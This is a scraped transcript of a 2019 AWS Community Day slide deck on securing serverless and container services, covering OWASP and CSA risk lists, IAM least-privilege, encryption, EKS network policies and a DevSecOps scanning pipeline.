securing serverless and container services
play

Securing Serverless and Container Services Marc Schrter AWS DevOps - PowerPoint PPT Presentation

Securing Serverless and Container Services Marc Schrter AWS DevOps Engineer @ globaldatanet Community Day 2019 Sponsors Serverless DevOps Automation Continuous Delivery Highly scalable and Infrastructure as Code fault-tolerant solutions


  1. Securing Serverless and Container Services Marc Schröter AWS DevOps Engineer @ globaldatanet Community Day 2019 Sponsors

  2. Serverless DevOps Automation Continuous Delivery Highly scalable and Infrastructure as Code fault-tolerant solutions Cloud Security Container Security and Managing the full Compliance Controls container life cycle

  3. What is serverless, and how does it impact your approach to security?

  4. What is serverless? Shift operational responsibilities to AWS Increasing your agility and innovation

  5. No infrastructure provisioning, Automatic scaling no management Pay for value Highly available and secure

  6. COMPUTE AWS AWS Lambda Fargate DATA STORES Amazon Amazon Aurora AWS S3 Serverless DynamoDB INTEGRATION Amazon Amazon Amazon Amazon API Gateway SQS SNS Step Functions

  7. Serverless Risks - OWASP A1: Injection A2: Broken Authentication A3: Sensitive Data Exposure A4: XML External Entities (XXE) A5: Broken Access Control A6: Security Misconfiguration A7: Cross-Site Scripting (XSS) A8: Insecure Deserialization A9: Using Components with Known Vulnerabilities A10: Insufficient Logging and Monitoring

  8. Serverless Risks - CSA SAS-1: Function Event Data Injection SAS-2: Broken Authentication SAS-3: Insecure Serverless Deployment Configuration SAS-4: Over-Privileged Function Permissions & Roles SAS-5: Inadequate Function Monitoring and Logging SAS-6: Insecure Third-Party Dependencies SAS-7: Insecure Application Secrets Storage SAS-8: Denial of Service & Financial Resource Exhaustion SAS-9: Serverless Business Logic Manipulation SAS-10: Improper Exception Handling and Verbose Error Messages SAS-11: Obsolete Functions, Cloud Resources and Event Triggers SAS-12: Cross-Execution Data Persistency

  9. Serverless Risk Categorization Application Code & Deployment Serverless Platform Misc.Risks App Logic Risks Configurations Risks Risks DoS Injection Security misconfiguration Broken access control Unused functions Broken Authentication Overprivileged permission Inadequate Monitoring Data Persistency Sensitive data exposure Insecure secrets storage XSS, XXE Insecure deserialization Known vulnerabilities Improper exception handling

  10. A1: Injection

  11. Injection

  12. Injection ● Use Web Application Firewall ● Validate data based on schemas and data transfer objects ● Always use an ORM ● Escape special characters ● Use least privileges ● Consider all event types and entry points into the system ● Use a commercial runtime defense solution

  13. A2: Broken Authentication

  14. Broken Authentication ● AWS Cognito or Single Sign-On ● API Gateway Access control ○ API keys ○ Usage plans ○ AWS IAM roles and policies ○ Amazon Cognito user pools ○ Lambda authorizer functions ● Service authentication between internal resources ○ SAML, OAuth2, Security Tokens ○ Encrypted channels ○ Password and key management ○ Client certificate ○ OTA/2FA

  15. A3: Sensitive Data Exposure

  16. Sensitive Data Exposure ● Identify and classify sensitive data ● Minimize storage of sensitive data ● Protect data at rest and in transit ● Use HTTPS only endpoints for APIs ● Key management ● Encryption of stored data ● Secret Management ● Environment variables encryption

  17. A5: Broken Access Control

  18. Broken Access Control Fine grained access control POST customers table GET orders table DELETE Amazon API Gateway queue

  19. Broken Access Control Follow least-privilege

  20. Broken Access Control Automate permission configuration

  21. Broken Access Control Automate permission configuration

  22. Broken Access Control Automate security testing of IaC CF Script Pull CF Script from S3 S3 Event for stack CREATE/UPDATE Notify on failure CloudFormation Lambda CloudWatch SES

  23. Broken Access Control Analyze IAM access patterns programmatically

  24. Broken Access Control Analyze IAM access patterns programmatically

  25. Broken Access Control Follow AWS IAM Best Practices

  26. A7: Security Misconfiguration

  27. Security Misconfiguration ● Enforce access control ● Providers security best practices ● Check for functions with unlinked triggers ● Resources that appear in policies but are not linked back to the function ● Set timeouts to the minimum required by the function ● Use automatic tools that detect security misconfigurations

  28. A7: Known Vulnerabilities

  29. Known Vulnerabilities ● Continuously monitor dependencies and their versions ● Only obtain components from official sources ● Continuously monitor sources like CVE and NVD ● Platform based advisories like NodeSecurity, PyUp, OWASP SafeNuGet, etc. ● Scan dependencies for known vulnerabilities ○ OWASP Dependency Check ○ GitHub Security Alerts ○ Gitlab Dependency Scanning ○ WhiteSource

  30. Serverless Security Demo

  31. Serverless Security Demo 1. Information Gathering 2. Function Reverse Engineering 3. Digging For Gold Inside Environment Variables 4. Exploiting Over-Privileged IAM Roles 5. Abusing Insecure Cloud Configurations 6. Finding Known Vulnerabilities In Open Source Packages

  32. Security for Amazon Kubernetes Cluster

  33. Encrypt communication ● Between web clients and your loadbalancer ○ Use the application loadbalancer (ALB) ○ Can be achieved with the ALB-Ingress-Controller ○ ALB provides routing and security options for the application layer ● Between your loadbalancer and pod ○ Encryptions support of your application or application server ○ Run a sidecar on your pod which performs encryption ○ Run a complete service mesh like Istio ● Between your pod and your AWS RDS database

  34. Encrypt storage ● Databases ● Persistent Volume Claims (PVC)

  35. Restrict inbound and outbound traffic ● Use network policies ● Network Policy engine (Calico)

  36. More EKS Security Tips ● Use a firewall to block known web attacks ● Protect yourself from DDos attacks ● Secure your AWS account ● Use namespaces and secrets ● Cyber attack detection ● Review your security setup ● Scan your container images ○ Aqua Security Microscanner ○ CoresOS Clair ○ Anchore engine

  37. Container DevSecOps

  38. AWS Cloud9 7. Adds feedback to 6. Triggers Lambda 1.Pull Request Pull Request Function Amazon CloudWatch AWS CodeCommit AWS Lambda Developer Event Rule (Application Repo) Function 2. Triggers 5. CodeBuild Success/Failure CodePipeline triggers Rule AWS CodePipeline VULNERABILITY PUBLISH IMAGE PULL REQUEST DOCKER LINTING SECRETS SCANNING SCANNING Configs Development AWS CodeBuild AWS CodeBuild AWS CodeBuild AWS CodeBuild 4. Builds and pushes 3. Pushes vulnerabilities Image to ECR to Security Hub AWS Security Hub Amazon ECR

  39. Build with services not servers Ahhhh and we are hiring globaldatanet mail@globaldatanet.com globaldatanet globaldatanet.com

Recommend


More recommend